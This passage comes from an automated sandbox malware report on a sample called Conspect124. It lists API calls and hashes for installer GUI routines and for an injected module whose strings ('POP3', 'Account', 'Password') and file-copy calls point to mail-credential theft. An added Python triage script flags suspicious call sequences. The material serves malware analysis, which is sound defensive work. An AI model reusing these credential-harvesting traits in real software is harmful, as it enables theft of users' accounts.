                                      • Instruction Fuzzy Hash: 33E04F35100644AFCF22BF28CE18A493B29FF18341F004868F90447421CB39DA53CB44
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4177404484.0000000023BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23BC0000, based on PE: true
                                      • Associated: 00000007.00000002.4177383917.0000000023BC0000.00000004.00001000.00020000.00000000.sdmp
                                      • Associated: 00000007.00000002.4177404484.0000000023BD6000.00000040.00001000.00020000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_23bc0000_Conspect124.jbxd
                                      Similarity
                                      • API ID: HeapProcess
                                      • String ID:
                                      • API String ID: 54951025-0
                                      • Opcode ID: 7199a2d99c3b66f484d8e77822b44e1eb046b6af2c822ab9e0f7bb708c56b72f
                                      • Instruction ID: c4cf972f4f9c4833798ceadcc7f179c926c38f0a9c8452dfc254349bcba76e50
                                      • Opcode Fuzzy Hash: 7199a2d99c3b66f484d8e77822b44e1eb046b6af2c822ab9e0f7bb708c56b72f
                                      • Instruction Fuzzy Hash: FDA0113820020A8F8320AF38833A20C3AACAE28280B00002EA80CCA800EB38C0208A08

                                      Control-flow Graph (interactive basic-block graph not reproduced; colour legend: Executed / Not Executed; entry block 004053EF-0040540A, blocks listed under APIs below)
                                      APIs
                                      • GetDlgItem.USER32(?,00000403), ref: 0040544D
                                      • GetDlgItem.USER32(?,000003EE), ref: 0040545C
                                      • GetClientRect.USER32(?,?), ref: 00405499
                                      • GetSystemMetrics.USER32(00000002), ref: 004054A0
                                      • SendMessageW.USER32(?,00001061,00000000,?), ref: 004054C1
                                      • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004054D2
                                      • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004054E5
                                      • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004054F3
                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405506
                                      • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405528
                                      • ShowWindow.USER32(?,00000008), ref: 0040553C
                                      • GetDlgItem.USER32(?,000003EC), ref: 0040555D
                                      • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040556D
                                      • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405586
                                      • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405592
                                      • GetDlgItem.USER32(?,000003F8), ref: 0040546B
                                        • Part of subcall function 00404216: SendMessageW.USER32(00000028,?,?,00404041), ref: 00404224
                                      • GetDlgItem.USER32(?,000003EC), ref: 004055AF
                                      • CreateThread.KERNEL32(00000000,00000000,Function_00005383,00000000), ref: 004055BD
                                      • CloseHandle.KERNEL32(00000000), ref: 004055C4
                                      • ShowWindow.USER32(00000000), ref: 004055E8
                                      • ShowWindow.USER32(?,00000008), ref: 004055ED
                                      • ShowWindow.USER32(00000008), ref: 00405637
                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566B
                                      • CreatePopupMenu.USER32 ref: 0040567C
                                      • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405690
                                      • GetWindowRect.USER32(?,?), ref: 004056B0
                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004056C9
                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405701
                                      • OpenClipboard.USER32(00000000), ref: 00405711
                                      • EmptyClipboard.USER32 ref: 00405717
                                      • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405723
                                      • GlobalLock.KERNEL32(00000000), ref: 0040572D
                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405741
                                      • GlobalUnlock.KERNEL32(00000000), ref: 00405761
                                      • SetClipboardData.USER32(0000000D,00000000), ref: 0040576C
                                      • CloseClipboard.USER32 ref: 00405772
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4155949371.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.4155927837.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4155977051.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4155997104.000000000040A000.00000008.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4156025065.000000000045C000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4156025065.000000000046F000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4156025065.00000000004A3000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                      • String ID: {$6B
                                      • API String ID: 590372296-3705917127
                                      • Opcode ID: f207d9dfce8d81be78cd7e6ccb04fd8fa9cb690570b2b3c7b57706b457d87968
                                      • Instruction ID: d3ec127817543c8dcb48433ae4040966c093085d210dffb8a3526856162b3191
                                      • Opcode Fuzzy Hash: f207d9dfce8d81be78cd7e6ccb04fd8fa9cb690570b2b3c7b57706b457d87968
                                      • Instruction Fuzzy Hash: B1B14A70900609FFDB119FA1DD89AAE7B79FB44354F00403AFA45B61A0CB754E52DF68
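                                      The two API lists above (IsDebuggerPresent → SetUnhandledExceptionFilter → UnhandledExceptionFilter at 23BC61DA, and the OpenClipboard → SetClipboardData(0000000D) → CloseClipboard run at 00405711-00405772) are what the report's "Contains functionality to check if a debugger is running" and "Contains functionality to modify clipboard data" signatures key on. A practitioner triaging many of these reports usually wants that matching done mechanically rather than by eye. The following is an added example, not part of the Joe Sandbox report or its tooling: it parses the report's own "• API.MODULE(args), ref: ADDR" line format, skips the "Part of subcall function" lines (they belong to a callee), orders calls by code address and checks for in-order API subsequences. The sequence names are my own labels, the sample text is constructed from lines copied from this listing, and the clipboard-format decoding is limited to a few documented CF_* constants (0x0D is CF_UNICODETEXT). Note the caveat on the clipboard hit: the same function also calls GetDlgItem, TrackPopupMenu and SendMessageW with 0x1073 (LVM_GETITEMTEXTW), so the sequence here reads as a GUI "copy list contents to clipboard" handler rather than clipboard hijacking; the sequence match is a triage lead, not a verdict.

```python
"""Parse Joe Sandbox "APIs" listing lines and flag ordered API-call sequences.

Added example, not part of the report. SAMPLE is constructed from lines in
the listing above; the sequence names in SEQUENCES are my own labels.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# One listing line, e.g. "• SetClipboardData.USER32(0000000D,00000000), ref: 0040576C"
# or, without an argument list, "• EmptyClipboard.USER32 ref: 00405717".
API_LINE = re.compile(
    r"^\s*•\s*(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<addr>[0-9A-Fa-f]+)\s*$"
)

# Clipboard format identifiers as documented for SetClipboardData.
CLIPBOARD_FORMATS = {1: "CF_TEXT", 7: "CF_OEMTEXT", 13: "CF_UNICODETEXT", 15: "CF_HDROP"}

# Ordered (not necessarily adjacent) API subsequences worth a closer look.
SEQUENCES: Dict[str, List[str]] = {
    "clipboard_write": ["OpenClipboard", "EmptyClipboard", "GlobalAlloc", "GlobalLock",
                        "GlobalUnlock", "SetClipboardData", "CloseClipboard"],
    "debugger_check_exception_filter": ["IsDebuggerPresent", "SetUnhandledExceptionFilter",
                                        "UnhandledExceptionFilter"],
    "self_terminate": ["GetCurrentProcess", "TerminateProcess", "ExitProcess"],
}


@dataclass(frozen=True)
class Call:
    api: str
    module: str
    args: List[str]
    addr: int


def parse_api_blocks(text: str) -> List[List[Call]]:
    """Split at "APIs" headers; each block becomes its function's calls sorted by address.
    "Part of subcall function" lines are dropped: they describe a callee, not this body."""
    blocks: List[List[Call]] = []
    current: Optional[List[Call]] = None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = []
            blocks.append(current)
            continue
        if current is None or "Part of subcall function" in line:
            continue
        m = API_LINE.match(line)
        if not m:
            continue
        args = [a for a in (m.group("args") or "").split(",") if a]
        current.append(Call(m.group("api"), m.group("module"), args, int(m.group("addr"), 16)))
    for block in blocks:
        block.sort(key=lambda c: c.addr)
    return blocks


def contains_sequence(calls: List[Call], pattern: List[str]) -> Optional[List[int]]:
    """In-order subsequence match on API names; returns matched addresses or None."""
    matched: List[int] = []
    for call in calls:
        if len(matched) < len(pattern) and call.api == pattern[len(matched)]:
            matched.append(call.addr)
    return matched if len(matched) == len(pattern) else None


def clipboard_format(calls: List[Call]) -> Optional[str]:
    """Decode the first argument of SetClipboardData (uFormat) when it is a hex literal."""
    for call in calls:
        if call.api == "SetClipboardData" and call.args and call.args[0] != "?":
            value = int(call.args[0], 16)
            return CLIPBOARD_FORMATS.get(value, f"format 0x{value:X}")
    return None


def scan(text: str) -> List[Dict[str, object]]:
    """One result per APIs block: entry address, call count, matched sequences, clipboard format."""
    results: List[Dict[str, object]] = []
    for calls in parse_api_blocks(text):
        if not calls:
            continue
        hits: Dict[str, List[int]] = {}
        for name, pattern in SEQUENCES.items():
            addrs = contains_sequence(calls, pattern)
            if addrs is not None:
                hits[name] = addrs
        results.append({"first_addr": calls[0].addr, "calls": len(calls),
                        "sequences": hits, "clipboard_format": clipboard_format(calls)})
    return results


# Constructed sample: lines copied from the two listings discussed above.
SAMPLE = """\
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 23BC61DA
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 23BC61E4
• UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 23BC61F1
APIs
• SendMessageW.USER32(?,00001073,00000000,?), ref: 00405701
  • Part of subcall function 00404216: SendMessageW.USER32(00000028,?,?,00404041), ref: 00404224
• OpenClipboard.USER32(00000000), ref: 00405711
• EmptyClipboard.USER32 ref: 00405717
• GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405723
• GlobalLock.KERNEL32(00000000), ref: 0040572D
• GlobalUnlock.KERNEL32(00000000), ref: 00405761
• SetClipboardData.USER32(0000000D,00000000), ref: 0040576C
• CloseClipboard.USER32 ref: 00405772
"""

if __name__ == "__main__":
    for result in scan(SAMPLE):
        print(f"{result['first_addr']:08X}: {result['calls']} calls, "
              f"sequences={list(result['sequences'])}, clipboard={result['clipboard_format']}")
```

                                      Run against a whole report export, `scan` gives one row per function; a sequence hit in a function that also touches window or menu APIs (as here) deserves a look at its neighbours before it is counted as malicious behaviour.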

                                      Control-flow Graph (interactive basic-block graph not reproduced; colour legend: Executed / Not Executed; entry block 00403D08-00403D1A, blocks listed under APIs below)
                                      APIs
                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D44
                                      • ShowWindow.USER32(?), ref: 00403D61
                                      • DestroyWindow.USER32 ref: 00403D75
                                      • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403D91
                                      • GetDlgItem.USER32(?,?), ref: 00403DB2
                                      • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403DC6
                                      • IsWindowEnabled.USER32(00000000), ref: 00403DCD
                                      • GetDlgItem.USER32(?,?), ref: 00403E7B
                                      • GetDlgItem.USER32(?,00000002), ref: 00403E85
                                      • SetClassLongW.USER32(?,000000F2,?), ref: 00403E9F
                                      • SendMessageW.USER32(0000040F,00000000,?,?), ref: 00403EF0
                                      • GetDlgItem.USER32(?,00000003), ref: 00403F96
                                      • ShowWindow.USER32(00000000,?), ref: 00403FB7
                                      • EnableWindow.USER32(?,?), ref: 00403FC9
                                      • EnableWindow.USER32(?,?), ref: 00403FE4
                                      • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 00403FFA
                                      • EnableMenuItem.USER32(00000000), ref: 00404001
                                      • SendMessageW.USER32(?,000000F4,00000000,?), ref: 00404019
                                      • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040402C
                                      • lstrlenW.KERNEL32(004236E8,?,004236E8,00000000), ref: 00404056
                                      • SetWindowTextW.USER32(?,004236E8), ref: 0040406A
                                      • ShowWindow.USER32(?,0000000A), ref: 0040419E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4155949371.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.4155927837.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4155977051.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4155997104.000000000040A000.00000008.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4156025065.000000000045C000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4156025065.000000000046F000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4156025065.00000000004A3000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                      • String ID: 6B
                                      • API String ID: 184305955-4127139157
                                      • Opcode ID: a4db143bb65d0e391743e1b67bf87524629fdee33245fd25fce41cee6e60d782
                                      • Instruction ID: aba62e874285a6ff7dd8be06960963098d8abb6283381b386aa5fa49e43a5191
                                      • Opcode Fuzzy Hash: a4db143bb65d0e391743e1b67bf87524629fdee33245fd25fce41cee6e60d782
                                      • Instruction Fuzzy Hash: 35C1C071640205BBDB216F61EE88E2B3A6CFB95705F40053EF641B52F0CB3A5992DB2D

                                      Control-flow Graph (interactive basic-block graph not reproduced; colour legend: Executed / Not Executed; entry block 0040395A-00403972, blocks listed under APIs below)
                                      APIs
                                        • Part of subcall function 00406626: GetModuleHandleA.KERNEL32(?,00000020,?,004033AF,0000000A), ref: 00406638
                                        • Part of subcall function 00406626: GetProcAddress.KERNEL32(00000000,?), ref: 00406653
                                      • lstrcatW.KERNEL32(00437000,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000,00000002,00437800,74DF3420,00435000,00000000), ref: 004039DB
                                      • lstrlenW.KERNEL32(004281A0,?,?,?,004281A0,00000000,00435800,00437000,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000,00000002,00437800), ref: 00403A5B
                                      • lstrcmpiW.KERNEL32(00428198,.exe,004281A0,?,?,?,004281A0,00000000,00435800,00437000,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000), ref: 00403A6E
                                      • GetFileAttributesW.KERNEL32(004281A0), ref: 00403A79
                                      • LoadImageW.USER32(00000067,?,00000000,00000000,00008040,00435800), ref: 00403AC2
                                        • Part of subcall function 00406193: wsprintfW.USER32 ref: 004061A0
                                      • RegisterClassW.USER32(004291A0), ref: 00403AFF
                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B17
                                      • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B4C
                                      • ShowWindow.USER32(00000005,00000000), ref: 00403B82
                                      • GetClassInfoW.USER32(00000000,RichEdit20W,004291A0), ref: 00403BAE
                                      • GetClassInfoW.USER32(00000000,RichEdit,004291A0), ref: 00403BBB
                                      • RegisterClassW.USER32(004291A0), ref: 00403BC4
                                      • DialogBoxParamW.USER32(?,00000000,00403D08,00000000), ref: 00403BE3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4155949371.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.4155927837.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4155977051.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4155997104.000000000040A000.00000008.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4156025065.000000000045C000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4156025065.000000000046F000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4156025065.00000000004A3000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                      • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$6B
                                      • API String ID: 1975747703-949986762
                                      • Opcode ID: de1469bc4878199ea01b60fec97fd66d0310a25772ab1ef6440d8c2ceb6dcd7b
                                      • Instruction ID: 49200ef38db144648603e0831490e707cb7affae0874970ced47d7304c9e666f
                                      • Opcode Fuzzy Hash: de1469bc4878199ea01b60fec97fd66d0310a25772ab1ef6440d8c2ceb6dcd7b
                                      • Instruction Fuzzy Hash: D561B970204601BAE330AF669D49F2B3A7CEB84745F40457FF945B52E2CB7D5912CA2D

                                      Control-flow Graph (interactive basic-block graph not reproduced; colour legend: Executed / Not Executed; entry block 0040437E-00404390, blocks listed under APIs below)
                                      APIs
                                      • CheckDlgButton.USER32(?,-0000040A,?), ref: 0040441C
                                      • GetDlgItem.USER32(?,000003E8), ref: 00404430
                                      • SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 0040444D
                                      • GetSysColor.USER32(?), ref: 0040445E
                                      • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040446C
                                      • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040447A
                                      • lstrlenW.KERNEL32(?), ref: 0040447F
                                      • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040448C
                                      • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004044A1
                                      • GetDlgItem.USER32(?,0000040A), ref: 004044FA
                                      • SendMessageW.USER32(00000000), ref: 00404501
                                      • GetDlgItem.USER32(?,000003E8), ref: 0040452C
                                      • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040456F
                                      • LoadCursorW.USER32(00000000,00007F02), ref: 0040457D
                                      • SetCursor.USER32(00000000), ref: 00404580
                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00404599
                                      • SetCursor.USER32(00000000), ref: 0040459C
                                      • SendMessageW.USER32(00000111,?,00000000), ref: 004045CB
                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 004045DD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4155949371.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.4155927837.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4155977051.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4155997104.000000000040A000.00000008.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4156025065.000000000045C000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4156025065.000000000046F000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4156025065.00000000004A3000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                      • String ID: N
                                      • API String ID: 3103080414-1130791706
                                      • Opcode ID: 868c1d48af680dab98623212c2c2391fab089ac2f5c5a3188426b6b277364ed0
                                      • Instruction ID: b1457f7914280a06e64b3deddd6598f3d1f5c62ed4ca7ede05d387843edeb913
                                      • Opcode Fuzzy Hash: 868c1d48af680dab98623212c2c2391fab089ac2f5c5a3188426b6b277364ed0
                                      • Instruction Fuzzy Hash: B96173B1A00209BFDB109F60DD45EAA7B69FB94344F00813AFB05B62E0D7789952DF59

                                      Control-flow Graph (interactive basic-block graph not reproduced; colour legend: Executed / Not Executed; entry block 23BC173A-23BC17FE, blocks listed under APIs below)
                                      APIs
                                        • Part of subcall function 23BC1CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 23BC1D1B
                                        • Part of subcall function 23BC1CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 23BC1D37
                                        • Part of subcall function 23BC1CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 23BC1D4B
                                      • _strlen.LIBCMT ref: 23BC1855
                                      • _strlen.LIBCMT ref: 23BC1869
                                      • _strlen.LIBCMT ref: 23BC188B
                                      • _strlen.LIBCMT ref: 23BC18AE
                                      • _strlen.LIBCMT ref: 23BC18C8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4177404484.0000000023BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23BC0000, based on PE: true
                                      • Associated: 00000007.00000002.4177383917.0000000023BC0000.00000004.00001000.00020000.00000000.sdmp
                                      • Associated: 00000007.00000002.4177404484.0000000023BD6000.00000040.00001000.00020000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_23bc0000_Conspect124.jbxd
                                      Similarity
                                      • API ID: _strlen$File$CopyCreateDelete
                                      • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                      • API String ID: 3296212668-3023110444
                                      • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                      • Instruction ID: 48082d84d74ea9dba936f214ee17cd678e3fb569ad660aca1abae66eab1a1641
                                      • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                      • Instruction Fuzzy Hash: 5F61D271D00398AEEF31DFA4C840BDEB7B9AF69200F5448F6D205B7260DBB45A478B56

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4177404484.0000000023BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23BC0000, based on PE: true
                                      • Associated: 00000007.00000002.4177383917.0000000023BC0000.00000004.00001000.00020000.00000000.sdmp
                                      • Associated: 00000007.00000002.4177404484.0000000023BD6000.00000040.00001000.00020000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_23bc0000_Conspect124.jbxd
                                      Similarity
                                      • API ID: _strlen
                                      • String ID: %m$~$Gon~$~F@7$~dra
                                      • API String ID: 4218353326-230879103
                                      • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                      • Instruction ID: 67c1435776caa90b191f49e4b1c12d7eb1d9fefacc3e0eeb1824304762ee2981
                                      • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                      • Instruction Fuzzy Hash: B4711771D002A85FCF31DFB48894AEF7BFC9B59600F1448E6E544E7241EA749B86CBA4

                                      APIs
                                      • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                      • BeginPaint.USER32(?,?), ref: 00401047
                                      • GetClientRect.USER32(?,?), ref: 0040105B
                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                      • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                      • DeleteObject.GDI32(?), ref: 004010ED
                                      • CreateFontIndirectW.GDI32(?), ref: 00401105
                                      • SetBkMode.GDI32(00000000,?), ref: 00401126
                                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                      • SelectObject.GDI32(00000000,?), ref: 00401140
                                      • DrawTextW.USER32(00000000,00429200,000000FF,00000010,00000820), ref: 00401156
                                      • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                      • DeleteObject.GDI32(?), ref: 00401165
                                      • EndPaint.USER32(?,?), ref: 0040116E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4155949371.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.4155927837.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4155977051.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4155997104.000000000040A000.00000008.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4156025065.000000000045C000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4156025065.000000000046F000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4156025065.00000000004A3000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                      • String ID: F
                                      • API String ID: 941294808-1304234792
                                      • Opcode ID: dddf6588841e3707deee37d13ddb8de347a630f4291ad0a352021d00e496f588
                                      • Instruction ID: 53e7ac87f6412b54f62e8112edad18e9e8f6d31619aee210d26213a62ff7d26c
                                      • Opcode Fuzzy Hash: dddf6588841e3707deee37d13ddb8de347a630f4291ad0a352021d00e496f588
                                      • Instruction Fuzzy Hash: 88418A71800209AFCF058FA5DE459AF7BB9FF44310F00842AF991AA1A0C738D955DFA4
                                      APIs
                                      • GetDlgItem.USER32(?,000003FB), ref: 004046FF
                                      • SetWindowTextW.USER32(00000000,?), ref: 00404729
                                      • SHBrowseForFolderW.SHELL32(?), ref: 004047DA
                                      • CoTaskMemFree.OLE32(00000000), ref: 004047E5
                                      • lstrcmpiW.KERNEL32(004281A0,004236E8,00000000,?,?), ref: 00404817
                                      • lstrcatW.KERNEL32(?,004281A0), ref: 00404823
                                      • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404835
                                        • Part of subcall function 00405892: GetDlgItemTextW.USER32(?,?,00000400,0040486C), ref: 004058A5
                                        • Part of subcall function 004064E0: CharNextW.USER32(?,*?|<>/":,00000000,00000000,00437800,00437800,00435000,00403318,00437800,74DF3420,00403589,?,00000006,00000008,0000000A), ref: 00406543
                                        • Part of subcall function 004064E0: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406552
                                        • Part of subcall function 004064E0: CharNextW.USER32(?,00000000,00437800,00437800,00435000,00403318,00437800,74DF3420,00403589,?,00000006,00000008,0000000A), ref: 00406557
                                        • Part of subcall function 004064E0: CharPrevW.USER32(?,?,00437800,00437800,00435000,00403318,00437800,74DF3420,00403589,?,00000006,00000008,0000000A), ref: 0040656A
                                      • GetDiskFreeSpaceW.KERNEL32(004216B8,?,?,0000040F,?,004216B8,004216B8,?,?,004216B8,?,?,000003FB,?), ref: 004048F8
                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404913
                                        • Part of subcall function 00404A6C: lstrlenW.KERNEL32(004236E8,004236E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B0D
                                        • Part of subcall function 00404A6C: wsprintfW.USER32 ref: 00404B16
                                        • Part of subcall function 00404A6C: SetDlgItemTextW.USER32(?,004236E8), ref: 00404B29
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4155949371.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.4155927837.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4155977051.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4155997104.000000000040A000.00000008.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4156025065.000000000045C000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4156025065.000000000046F000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4156025065.00000000004A3000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                      • String ID: A$6B
                                      • API String ID: 2624150263-3505403099
                                      • Opcode ID: afaa8b046b85c6c4999a48e5951142db6eeca15c55dcff4a9d7871d2c438c698
                                      • Instruction ID: 3caff43168dd0751864d44f5cbb06f26c6104a46936f7057387f9fb8a2ee2b83
                                      • Opcode Fuzzy Hash: afaa8b046b85c6c4999a48e5951142db6eeca15c55dcff4a9d7871d2c438c698
                                      • Instruction Fuzzy Hash: DFA197F1A00209ABDB11AFA5CD45AAF77B8EF84714F10843BF601B62D1D77C99418B6D
                                      APIs
                                      • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,?,?,00406033,?,?), ref: 00405ED3
                                      • GetShortPathNameW.KERNEL32(?,00426D88,00000400), ref: 00405EDC
                                        • Part of subcall function 00405CA3: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CB3
                                        • Part of subcall function 00405CA3: lstrlenA.KERNEL32(00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CE5
